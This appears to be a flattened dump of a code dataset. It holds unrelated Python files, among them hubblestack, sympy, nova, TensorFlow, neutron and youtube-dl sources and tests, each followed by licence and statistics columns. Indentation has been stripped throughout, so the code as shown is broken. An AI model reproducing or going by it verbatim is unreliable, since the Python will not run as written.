def test_config_InvalidDictsep_ReturnDict(self, config_file):
'''
Test that given an invalid ``dictsep`` and valid arguments,
the function returns a dict with values of ``None``
'''
sample_data = self.generate_config_data()
expected_status, expected_ret = True, {x: None for x in sample_data
if "master" not in x}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, ignore_pattern=".*master.*", dictsep="?", valsep=';', subsep=':')
assert expected_status == status
assert expected_ret == ret
def test_config_ValidArguments_ReturnDict(self, config_file):
'''
Test that given valid arguments, the function returns a valid dict
'''
expected_status, expected_ret = True, {"APP_ATTRIBUTES": {
"cluster_role": "worker", "zone": "1", "provider":"aws"}}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, pattern=".*(3|1).*", ignore_pattern=".*3.*",
dictsep="=", valsep=';', subsep=':')
assert expected_status == status
assert expected_ret == ret
def test_config_EmptyValsep_ReturnDict(self, config_file):
'''
Test that given valid arguments and an empty ``valsep``,
the function returns an incomplete dict
'''
expected_status, expected_ret = True, {"APP_ATTRIBUTES": {
"cluster_role": "control;zone:3;provider:aws"}}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, pattern=".*control.*", dictsep="=", subsep=':')
assert expected_status == status
assert expected_ret == ret
def test_config_EmptySubsep_ReturnDict(self, config_file):
'''
Test that given valid arguments and an empty ``subsep``,
the function returns a dict with a list as value
'''
expected_status, expected_ret = True, {"APP_ATTRIBUTES": ["cluster_role:control",
"zone:3",
"provider:aws"]}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, ignore_pattern=".*(worker|master).*", dictsep="=", valsep=';')
assert expected_status == status
assert expected_ret == ret
def test_readfileString_InvalidPath_emptyReturn(self):
'''
Test that given invalid arguments, the function returns False and None.
'''
expected_status, expected_ret = False, None
status, ret= hubblestack.extmods.fdg.readfile.readfile_string('/invalid/path')
assert status == expected_status
assert ret == expected_ret
def test_readfileString_ValidPathFalseEncode_returnString(self, json_file):
'''
Test that given a valid path, the contents are returned as string with no encoding
'''
with open(json_file, 'w') as jfile:
jfile.writelines(["First line", "Second line", "Foo bar line"])
status, ret = hubblestack.extmods.fdg.readfile.readfile_string(json_file)
assert status == True
assert ret == "First lineSecond lineFoo bar line"
def test_readfileString_ValidPathTrueEncode_returnEncodedString(self, json_file):
'''
Test that given a valid path, the contents are returned as string
'''
with open(json_file, 'w') as jfile:
jfile.writelines(["Foo", "bar"])
status, ret = hubblestack.extmods.fdg.readfile.readfile_string(json_file, encode_b64=True)
assert status == True
# encoded Foobar
assert ret == 'Rm9vYmFy'
| apache-2.0 | 8,993,810,925,713,265,000 | 40.915921 | 100 | 0.606504 | false |
toolforger/sympy | sympy/printing/python.py | 118 | 3256 | # -*- coding: utf-8 -*-
from __future__ import print_function, division
import keyword as kw
import sympy
from .repr import ReprPrinter
from .str import StrPrinter
# A list of classes that should be printed using StrPrinter
STRPRINT = ("Add", "Infinity", "Integer", "Mul", "NegativeInfinity",
"Pow", "Zero")
class PythonPrinter(ReprPrinter, StrPrinter):
"""A printer which converts an expression into its Python interpretation."""
def __init__(self, settings=None):
ReprPrinter.__init__(self)
StrPrinter.__init__(self, settings)
self.symbols = []
self.functions = []
# Create print methods for classes that should use StrPrinter instead
# of ReprPrinter.
for name in STRPRINT:
f_name = "_print_%s" % name
f = getattr(StrPrinter, f_name)
setattr(PythonPrinter, f_name, f)
def _print_Function(self, expr):
func = expr.func.__name__
if not hasattr(sympy, func) and not func in self.functions:
self.functions.append(func)
return StrPrinter._print_Function(self, expr)
# procedure (!) for defining symbols which have be defined in print_python()
def _print_Symbol(self, expr):
symbol = self._str(expr)
if symbol not in self.symbols:
self.symbols.append(symbol)
return StrPrinter._print_Symbol(self, expr)
def _print_module(self, expr):
raise ValueError('Modules in the expression are unacceptable')
def python(expr, **settings):
"""Return Python interpretation of passed expression
(can be passed to the exec() function without any modifications)"""
printer = PythonPrinter(settings)
exprp = printer.doprint(expr)
result = ''
# Returning found symbols and functions
renamings = {}
for symbolname in printer.symbols:
newsymbolname = symbolname
# Escape symbol names that are reserved python keywords
if kw.iskeyword(newsymbolname):
while True:
newsymbolname += "_"
if (newsymbolname not in printer.symbols and
newsymbolname not in printer.functions):
renamings[sympy.Symbol(
symbolname)] = sympy.Symbol(newsymbolname)
break
result += newsymbolname + ' = Symbol(\'' + symbolname + '\')\n'
for functionname in printer.functions:
newfunctionname = functionname
# Escape function names that are reserved python keywords
if kw.iskeyword(newfunctionname):
while True:
newfunctionname += "_"
if (newfunctionname not in printer.symbols and
newfunctionname not in printer.functions):
renamings[sympy.Function(
functionname)] = sympy.Function(newfunctionname)
break
result += newfunctionname + ' = Function(\'' + functionname + '\')\n'
if not len(renamings) == 0:
exprp = expr.subs(renamings)
result += 'e = ' + printer._str(exprp)
return result
def print_python(expr, **settings):
"""Print output of python() function"""
print(python(expr, **settings))
| bsd-3-clause | -2,091,131,825,038,743,600 | 34.391304 | 80 | 0.609951 | false |
MountainWei/nova | nova/tests/unit/compute/test_resources.py | 57 | 11446 | # Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for the compute extra resources framework."""
from oslo_config import cfg
from stevedore import extension
from stevedore import named
from nova.compute import resources
from nova.compute.resources import base
from nova.compute.resources import vcpu
from nova import context
from nova.objects import flavor as flavor_obj
from nova import test
from nova.tests.unit import fake_instance
CONF = cfg.CONF
class FakeResourceHandler(resources.ResourceHandler):
def __init__(self, extensions):
self._mgr = \
named.NamedExtensionManager.make_test_instance(extensions)
class FakeResource(base.Resource):
def __init__(self):
self.total_res = 0
self.used_res = 0
def _get_requested(self, usage):
if 'extra_specs' not in usage:
return
if self.resource_name not in usage['extra_specs']:
return
req = usage['extra_specs'][self.resource_name]
return int(req)
def _get_limit(self, limits):
if self.resource_name not in limits:
return
limit = limits[self.resource_name]
return int(limit)
def reset(self, resources, driver):
self.total_res = 0
self.used_res = 0
def test(self, usage, limits):
requested = self._get_requested(usage)
if not requested:
return
limit = self._get_limit(limits)
if not limit:
return
free = limit - self.used_res
if requested <= free:
return
else:
return ('Free %(free)d < requested %(requested)d ' %
{'free': free, 'requested': requested})
def add_instance(self, usage):
requested = self._get_requested(usage)
if requested:
self.used_res += requested
def remove_instance(self, usage):
requested = self._get_requested(usage)
if requested:
self.used_res -= requested
def write(self, resources):
pass
def report_free(self):
return "Free %s" % (self.total_res - self.used_res)
class ResourceA(FakeResource):
def reset(self, resources, driver):
# ResourceA uses a configuration option
self.total_res = int(CONF.resA)
self.used_res = 0
self.resource_name = 'resource:resA'
def write(self, resources):
resources['resA'] = self.total_res
resources['used_resA'] = self.used_res
class ResourceB(FakeResource):
def reset(self, resources, driver):
# ResourceB uses resource details passed in parameter resources
self.total_res = resources['resB']
self.used_res = 0
self.resource_name = 'resource:resB'
def write(self, resources):
resources['resB'] = self.total_res
resources['used_resB'] = self.used_res
def fake_flavor_obj(**updates):
flavor = flavor_obj.Flavor()
flavor.id = 1
flavor.name = 'fakeflavor'
flavor.memory_mb = 8000
flavor.vcpus = 3
flavor.root_gb = 11
flavor.ephemeral_gb = 4
flavor.swap = 0
flavor.rxtx_factor = 1.0
flavor.vcpu_weight = 1
if updates:
flavor.update(updates)
return flavor
class BaseTestCase(test.NoDBTestCase):
def _initialize_used_res_counter(self):
# Initialize the value for the used resource
for ext in self.r_handler._mgr.extensions:
ext.obj.used_res = 0
def setUp(self):
super(BaseTestCase, self).setUp()
# initialize flavors and stub get_by_id to
# get flavors from here
self._flavors = {}
self.ctxt = context.get_admin_context()
# Create a flavor without extra_specs defined
_flavor_id = 1
_flavor = fake_flavor_obj(id=_flavor_id)
self._flavors[_flavor_id] = _flavor
# Create a flavor with extra_specs defined
_flavor_id = 2
requested_resA = 5
requested_resB = 7
requested_resC = 7
_extra_specs = {'resource:resA': requested_resA,
'resource:resB': requested_resB,
'resource:resC': requested_resC}
_flavor = fake_flavor_obj(id=_flavor_id,
extra_specs=_extra_specs)
self._flavors[_flavor_id] = _flavor
# create fake resource extensions and resource handler
_extensions = [
extension.Extension('resA', None, ResourceA, ResourceA()),
extension.Extension('resB', None, ResourceB, ResourceB()),
]
self.r_handler = FakeResourceHandler(_extensions)
# Resources details can be passed to each plugin or can be specified as
# configuration options
driver_resources = {'resB': 5}
CONF.resA = '10'
# initialise the resources
self.r_handler.reset_resources(driver_resources, None)
def test_update_from_instance_with_extra_specs(self):
# Flavor with extra_specs
_flavor_id = 2
sign = 1
self.r_handler.update_from_instance(self._flavors[_flavor_id], sign)
expected_resA = self._flavors[_flavor_id].extra_specs['resource:resA']
expected_resB = self._flavors[_flavor_id].extra_specs['resource:resB']
self.assertEqual(int(expected_resA),
self.r_handler._mgr['resA'].obj.used_res)
self.assertEqual(int(expected_resB),
self.r_handler._mgr['resB'].obj.used_res)
def test_update_from_instance_without_extra_specs(self):
# Flavor id without extra spec
_flavor_id = 1
self._initialize_used_res_counter()
self.r_handler.resource_list = []
sign = 1
self.r_handler.update_from_instance(self._flavors[_flavor_id], sign)
self.assertEqual(0, self.r_handler._mgr['resA'].obj.used_res)
self.assertEqual(0, self.r_handler._mgr['resB'].obj.used_res)
def test_write_resources(self):
self._initialize_used_res_counter()
extra_resources = {}
expected = {'resA': 10, 'used_resA': 0, 'resB': 5, 'used_resB': 0}
self.r_handler.write_resources(extra_resources)
self.assertEqual(expected, extra_resources)
def test_test_resources_without_extra_specs(self):
limits = {}
# Flavor id without extra_specs
flavor = self._flavors[1]
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_test_resources_with_limits_for_different_resource(self):
limits = {'resource:resC': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_passing_test_resources(self):
limits = {'resource:resA': 10, 'resource:resB': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
self._initialize_used_res_counter()
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_failing_test_resources_for_single_resource(self):
limits = {'resource:resA': 4, 'resource:resB': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
self._initialize_used_res_counter()
result = self.r_handler.test_resources(flavor, limits)
expected = ['Free 4 < requested 5 ', None]
self.assertEqual(sorted(expected),
sorted(result))
def test_empty_resource_handler(self):
"""An empty resource handler has no resource extensions,
should have no effect, and should raise no exceptions.
"""
empty_r_handler = FakeResourceHandler([])
resources = {}
empty_r_handler.reset_resources(resources, None)
flavor = self._flavors[1]
sign = 1
empty_r_handler.update_from_instance(flavor, sign)
limits = {}
test_result = empty_r_handler.test_resources(flavor, limits)
self.assertEqual([], test_result)
sign = -1
empty_r_handler.update_from_instance(flavor, sign)
extra_resources = {}
expected_extra_resources = extra_resources
empty_r_handler.write_resources(extra_resources)
self.assertEqual(expected_extra_resources, extra_resources)
empty_r_handler.report_free_resources()
def test_vcpu_resource_load(self):
# load the vcpu example
names = ['vcpu']
real_r_handler = resources.ResourceHandler(names)
ext_names = real_r_handler._mgr.names()
self.assertEqual(names, ext_names)
# check the extension loaded is the one we expect
# and an instance of the object has been created
ext = real_r_handler._mgr['vcpu']
self.assertIsInstance(ext.obj, vcpu.VCPU)
class TestVCPU(test.NoDBTestCase):
def setUp(self):
super(TestVCPU, self).setUp()
self._vcpu = vcpu.VCPU()
self._vcpu._total = 10
self._vcpu._used = 0
self._flavor = fake_flavor_obj(vcpus=5)
self._big_flavor = fake_flavor_obj(vcpus=20)
self._instance = fake_instance.fake_instance_obj(None)
def test_reset(self):
# set vcpu values to something different to test reset
self._vcpu._total = 10
self._vcpu._used = 5
driver_resources = {'vcpus': 20}
self._vcpu.reset(driver_resources, None)
self.assertEqual(20, self._vcpu._total)
self.assertEqual(0, self._vcpu._used)
def test_add_and_remove_instance(self):
self._vcpu.add_instance(self._flavor)
self.assertEqual(10, self._vcpu._total)
self.assertEqual(5, self._vcpu._used)
self._vcpu.remove_instance(self._flavor)
self.assertEqual(10, self._vcpu._total)
self.assertEqual(0, self._vcpu._used)
def test_test_pass_limited(self):
result = self._vcpu.test(self._flavor, {'vcpu': 10})
self.assertIsNone(result, 'vcpu test failed when it should pass')
def test_test_pass_unlimited(self):
result = self._vcpu.test(self._big_flavor, {})
self.assertIsNone(result, 'vcpu test failed when it should pass')
def test_test_fail(self):
result = self._vcpu.test(self._flavor, {'vcpu': 2})
expected = 'Free CPUs 2.00 VCPUs < requested 5 VCPUs'
self.assertEqual(expected, result)
def test_write(self):
resources = {'stats': {}}
self._vcpu.write(resources)
expected = {
'vcpus': 10,
'vcpus_used': 0,
'stats': {
'num_vcpus': 10,
'num_vcpus_used': 0
}
}
self.assertEqual(sorted(expected),
sorted(resources))
| apache-2.0 | 6,284,124,628,291,576,000 | 32.370262 | 79 | 0.613489 | false |
rjw57/videosequence | test/test_simple_seeking.py | 1 | 2242 | from __future__ import print_function
from contextlib import closing
from PIL import ImageChops, ImageStat
from videosequence import VideoSequence
def assert_images_not_equal(im1, im2):
diff = ImageChops.difference(im1, im2)
for min_, max_ in ImageStat.Stat(diff).extrema:
if max_ > 0:
return
assert False
def assert_images_equal(im1, im2):
diff = ImageChops.difference(im1, im2)
for min_, max_ in ImageStat.Stat(diff).extrema:
if max_ != 0:
assert False
def test_duration(news_video, ice_video):
with closing(VideoSequence(news_video)) as s:
assert len(s) == 288
with closing(VideoSequence(ice_video)) as s:
assert len(s) == 468
def test_size(news_video):
with closing(VideoSequence(news_video)) as s:
assert s.width == 352
assert s.height == 288
def test_initial_and_final_frame(news_video, ice_video):
with closing(VideoSequence(news_video)) as s:
start = s[0]
end = s[-1]
assert_images_not_equal(start, end)
with closing(VideoSequence(ice_video)) as s:
start = s[0]
end = s[-1]
assert_images_not_equal(start, end)
def test_first_few_frames_differ(news_video):
with closing(VideoSequence(news_video)) as s:
last_mean = 0.0
for idx in range(5):
print("Frame", idx)
mean = ImageStat.Stat(s[idx]).mean[0]
assert mean != last_mean
assert mean > 0
last_mean = mean
def test_slice_news(news_video):
with closing(VideoSequence(news_video)) as s:
frames = [s[idx] for idx in range(5, 10)]
for f1, f2 in zip(frames, s[5:10]):
assert_images_equal(f1, f2)
def test_slice_ice(ice_video):
with closing(VideoSequence(ice_video)) as s:
frames = [s[idx] for idx in range(5, 10)]
for f1, f2 in zip(frames, s[5:10]):
assert_images_equal(f1, f2)
def __xtest_iteration(news_video, ice_video):
with closing(VideoSequence(news_video)) as s:
n = 0
for _ in s:
n += 1
assert n == len(s)
with closing(VideoSequence(ice_video)) as s:
n = 0
for _ in s:
n += 1
assert n == len(s)
| mit | -1,667,082,780,485,127,700 | 29.297297 | 56 | 0.597681 | false |
lukeiwanski/tensorflow | tensorflow/contrib/signal/python/ops/util_ops.py | 71 | 2459 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility ops shared across tf.contrib.signal."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fractions
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
def gcd(a, b, name=None):
"""Returns the greatest common divisor via Euclid's algorithm.
Args:
a: The dividend. A scalar integer `Tensor`.
b: The divisor. A scalar integer `Tensor`.
name: An optional name for the operation.
Returns:
A scalar `Tensor` representing the greatest common divisor between `a` and
`b`.
Raises:
ValueError: If `a` or `b` are not scalar integers.
"""
with ops.name_scope(name, 'gcd', [a, b]):
a = ops.convert_to_tensor(a)
b = ops.convert_to_tensor(b)
a.shape.assert_has_rank(0)
b.shape.assert_has_rank(0)
if not a.dtype.is_integer:
raise ValueError('a must be an integer type. Got: %s' % a.dtype)
if not b.dtype.is_integer:
raise ValueError('b must be an integer type. Got: %s' % b.dtype)
# TPU requires static shape inference. GCD is used for subframe size
# computation, so we should prefer static computation where possible.
const_a = tensor_util.constant_value(a)
const_b = tensor_util.constant_value(b)
if const_a is not None and const_b is not None:
return ops.convert_to_tensor(fractions.gcd(const_a, const_b))
cond = lambda _, b: math_ops.greater(b, array_ops.zeros_like(b))
body = lambda a, b: [b, math_ops.mod(a, b)]
a, b = control_flow_ops.while_loop(cond, body, [a, b], back_prop=False)
return a
| apache-2.0 | -2,648,607,239,785,765,400 | 35.701493 | 80 | 0.687271 | false |
sasukeh/neutron | neutron/tests/unit/plugins/oneconvergence/test_security_group.py | 28 | 4681 | # Copyright 2014 OneConvergence, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
from neutron.extensions import securitygroup as ext_sg
from neutron import manager
from neutron.plugins.oneconvergence import plugin as nvsd_plugin
from neutron.tests import tools
from neutron.tests.unit.agent import test_securitygroups_rpc as test_sg_rpc
from neutron.tests.unit.extensions import test_securitygroup as test_sg
PLUGIN_NAME = ('neutron.plugins.oneconvergence.'
'plugin.OneConvergencePluginV2')
AGENTNOTIFIER = ('neutron.plugins.oneconvergence.'
'plugin.NVSDPluginV2AgentNotifierApi')
DUMMY_NVSD_LIB = ('neutron.tests.unit.plugins.oneconvergence.'
'dummynvsdlib.NVSDApi')
class OneConvergenceSecurityGroupsTestCase(test_sg.SecurityGroupDBTestCase):
_plugin_name = PLUGIN_NAME
def setUp(self):
if 'v6' in self._testMethodName:
self.skipTest("NVSD Plugin does not support IPV6.")
def mocked_oneconvergence_init(self):
def side_effect(*args, **kwargs):
return {'id': str(uuid.uuid4())}
self.nvsdlib = mock.Mock()
self.nvsdlib.create_network.side_effect = side_effect
test_sg_rpc.set_firewall_driver(test_sg_rpc.FIREWALL_HYBRID_DRIVER)
notifier_cls = mock.patch(AGENTNOTIFIER).start()
self.notifier = mock.Mock()
notifier_cls.return_value = self.notifier
self.useFixture(tools.AttributeMapMemento())
with mock.patch.object(nvsd_plugin.OneConvergencePluginV2,
'oneconvergence_init',
new=mocked_oneconvergence_init):
super(OneConvergenceSecurityGroupsTestCase,
self).setUp(PLUGIN_NAME)
def tearDown(self):
super(OneConvergenceSecurityGroupsTestCase, self).tearDown()
class TestOneConvergenceSGServerRpcCallBack(
OneConvergenceSecurityGroupsTestCase,
test_sg_rpc.SGServerRpcCallBackTestCase):
pass
class TestOneConvergenceSecurityGroups(OneConvergenceSecurityGroupsTestCase,
test_sg.TestSecurityGroups,
test_sg_rpc.SGNotificationTestMixin):
def test_security_group_get_port_from_device(self):
with self.network() as n:
with self.subnet(n):
with self.security_group() as sg:
security_group_id = sg['security_group']['id']
res = self._create_port(self.fmt, n['network']['id'])
port = self.deserialize(self.fmt, res)
fixed_ips = port['port']['fixed_ips']
data = {'port': {'fixed_ips': fixed_ips,
'name': port['port']['name'],
ext_sg.SECURITYGROUPS:
[security_group_id]}}
req = self.new_update_request('ports', data,
port['port']['id'])
res = self.deserialize(self.fmt,
req.get_response(self.api))
port_id = res['port']['id']
plugin = manager.NeutronManager.get_plugin()
port_dict = plugin.get_port_from_device(mock.Mock(),
port_id)
self.assertEqual(port_id, port_dict['id'])
self.assertEqual([security_group_id],
port_dict[ext_sg.SECURITYGROUPS])
self.assertEqual([], port_dict['security_group_rules'])
self.assertEqual([fixed_ips[0]['ip_address']],
port_dict['fixed_ips'])
self._delete('ports', port_id)
def test_security_group_get_port_from_device_with_no_port(self):
plugin = manager.NeutronManager.get_plugin()
port_dict = plugin.get_port_from_device(mock.Mock(), 'bad_device_id')
self.assertIsNone(port_dict)
| apache-2.0 | -780,792,619,808,472,300 | 43.160377 | 78 | 0.590686 | false |
Kagee/youtube-dl | youtube_dl/extractor/ebaumsworld.py | 149 | 1055 | from __future__ import unicode_literals
from .common import InfoExtractor
class EbaumsWorldIE(InfoExtractor):
_VALID_URL = r'https?://www\.ebaumsworld\.com/video/watch/(?P<id>\d+)'
_TEST = {
'url': 'http://www.ebaumsworld.com/video/watch/83367677/',
'info_dict': {
'id': '83367677',
'ext': 'mp4',
'title': 'A Giant Python Opens The Door',
'description': 'This is how nightmares start...',
'uploader': 'jihadpizza',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
config = self._download_xml(
'http://www.ebaumsworld.com/video/player/%s' % video_id, video_id)
video_url = config.find('file').text
return {
'id': video_id,
'title': config.find('title').text,
'url': video_url,
'description': config.find('description').text,
'thumbnail': config.find('image').text,
'uploader': config.find('username').text,
}
| unlicense | -5,440,468,343,733,672,000 | 30.969697 | 78 | 0.538389 | false |
d2emon/gurps-helper | fill_dmg.py | 1 | 2024 | def thrustDice(value):
if value <= 10:
return 1
if value < 40:
return (value - 11) // 8 + 1
if value < 60:
return (value - 5) // 10 + 1
return (value) // 10 + 1
def thrustModifier(value):
if value <= 10:
return (value - 11) // 2 - 1
if value < 40:
return (value - 11) // 2 % 4 - 1
if value < 60:
return 1 + (value - 40) // 10 * 5 - (value - 40) // 5 * (value // 10 - 3)
if value < 70:
return (value - 60) // 5 * 2 - 1
if value < 100:
return (value - 60) // 5 % 2 * 2
return 0
def swingDice(value):
if value <= 10:
return 1
if value < 27:
return (value - 9) // 4 + 1
if value < 40:
return (value - 7) // 8 + 3
return (value) // 10 + 3
def swingModifier(value):
if value < 9:
return (value - 11) // 2
if value < 27:
return (value - 9) % 4 - 1
if value < 40:
g = (value - 9) // 2 + 1
return g % 4 - 1
if value < 60:
return (value - 40) // 5 % 2 * 2 - 1
if value < 100:
return (value - 60) // 5 % 2 * 2
return 0
def main():
import attributes
import db
e, s = db.connect()
s.query(attributes.BasicDamage).delete()
s.commit()
for st in range(1, 41):
print("{}\t{}d + {}\t{}d + {}".format(st, thrustDice(st), thrustModifier(st), swingDice(st), swingModifier(st)))
dmg = attributes.BasicDamage(
st,
[thrustDice(st), thrustModifier(st)],
[swingDice(st), swingModifier(st)],
)
print(dmg)
s.add(dmg)
for st in range(45, 101, 5):
print("{}\t{}d + {}\t{}d + {}".format(st, thrustDice(st), thrustModifier(st), swingDice(st), swingModifier(st)))
dmg = attributes.BasicDamage(
st,
[thrustDice(st), thrustModifier(st)],
[swingDice(st), swingModifier(st)],
)
print(dmg)
s.add(dmg)
s.commit()
if __name__ == "__main__":
main()
| gpl-3.0 | 4,602,057,884,589,448,700 | 24.3 | 120 | 0.48419 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.